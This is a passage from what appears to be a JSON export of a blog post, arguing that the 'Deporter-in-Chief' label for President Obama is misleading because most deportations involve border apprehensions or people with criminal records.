LOL"},"content":{"rendered":"<p>Amnesty supporters have ludicrously labeled President Obama \u201cDeporter-in-Chief.\u201d They cite the level of about 400,000 deportations per year. (<a href=\"http:\/\/abcnews.go.com\/blogs\/politics\/2012\/08\/spanish-ad-blasts-obama-as-deporter-in-chief\/\" target=\"_blank\">See here<\/a>)<\/p>\n<p>This claim is either clueless or duplicitous \u2013 probably the latter. The fact is that most of the deported illegal aliens are either newly arriving illegal aliens apprehended at the border or those being released from prison after doing time for crimes. The Congressional Research Service\u2019s immigration expert, Ruth Wasem, notes that about 360,000 people are apprehended by the Border Patrol each year.\u00a0(<a href=\"http:\/\/www.latimes.com\/nation\/politics\/politicsnow\/la-pn-immigration-asylum-claims-soar-20131212,0,1306964.story\" target=\"_blank\">See here<\/a>)<\/p>\n<p>And, according to Homeland Security data for deportations, (2011 is the most recent published) there were 188,382 persons with criminal records deported.<\/p>\n<p>What the amnesty advocates are trying to accomplish is to promote a further accommodation by the administration to allow all illegal aliens without convictions for violent crimes, including those newly arriving illegal aliens, to stay and be given amnesty. As long as amnesty legislation continues to be blocked in the House of Representatives, those amnesty advocates are pushing for Obama to assert executive power to halt most deportations and extend legal status to the illegal aliens the way he already has for illegal aliens given \u201cDeferred Action\u201d and other categories of illegal aliens.
